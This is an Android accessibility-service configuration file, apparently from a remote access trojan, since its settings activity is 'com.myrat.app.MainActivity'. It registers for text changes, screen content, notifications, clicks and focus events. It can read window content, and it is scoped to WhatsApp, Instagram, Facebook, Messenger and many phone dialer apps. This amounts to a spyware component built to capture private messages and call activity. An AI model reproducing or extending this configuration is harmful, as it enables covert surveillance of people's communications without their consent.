<?xml version="1.0" encoding="utf-8"?>
<accessibility-service
    xmlns:android="http://schemas.android.com/apk/res/android"
    android:accessibilityEventTypes="typeWindowContentChanged|typeViewTextChanged|typeWindowStateChanged|typeNotificationStateChanged|typeViewClicked|typeViewFocused"
    android:accessibilityFeedbackType="feedbackGeneric"
    android:accessibilityFlags="flagReportViewIds|flagRetrieveInteractiveWindows|flagIncludeNotImportantViews"
    android:packageNames="com.whatsapp,com.whatsapp.w4b,com.instagram.android,com.facebook.katana,com.facebook.orca,com.facebook.lite,com.android.dialer,com.google.android.dialer,com.samsung.android.dialer,com.miui.dialer,com.huawei.contacts,com.oneplus.dialer,com.oppo.dialer,com.vivo.dialer,com.realme.dialer"
    android:canRetrieveWindowContent="true"
    android:notificationTimeout="50"
    android:settingsActivity="com.myrat.app.MainActivity"
    android:description="@string/unified_accessibility_description"/>